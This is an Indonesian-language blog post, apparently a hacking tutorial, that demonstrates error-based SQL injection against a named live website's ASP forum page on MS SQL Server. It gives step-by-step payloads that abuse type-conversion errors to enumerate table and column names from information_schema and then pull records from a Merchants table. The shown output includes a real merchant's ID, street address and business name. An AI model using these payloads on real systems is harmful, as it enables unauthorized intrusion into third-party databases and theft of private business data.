CEK VULN / GAK !!!
==================
Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL
http://www.gamexus.com/mai
Jika Error nya seperti ini :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56
Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua Very Happy
maka Lanjut ...
CARI STRUKTUR TABEL !!!
=======================
1) Debugging
Debugging di sini untuk memunculkan pesan error dr MsSQL.
SQL Inject nya adalah "and 1="
2) Munculkan nama tabel
Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables)
http://www.gamexus.com/mai
Error yang muncul adalah :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56
bisa dilihat di situ kita dapat tabel dengan nama "Merchants".
berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.
skrg kita cari tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
http://www.gamexus.com/mai
Error yang muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56
Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^
nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))
http://www.gamexus.com/mai
Error yng muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.
CARI STRUKTUR COLUMN !!!
========================
Contoh kita mau cari column yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column dgn nama "merchantId" ... yok cari lagi column laen Very Happy
QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column "address". cari lage column ne ...
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns
http://www.gamexus.com/mai
Error yg muncul:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tuh column "merchantName" ekkekekeke ....
Silahkan kalo mo nyari lagi ^^
PENGAMBILAN DATA !!!
====================
Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 merchantid from merchants))--
http://www.gamexus.com/mai
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56
dapat "merchantid" = "alohacc".
nah gmn kalo mau ngambil isi column ne sekaligus ??
Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56
Note : %2b = + sedangkan ':' = pembatas
0 comments:
Post a Comment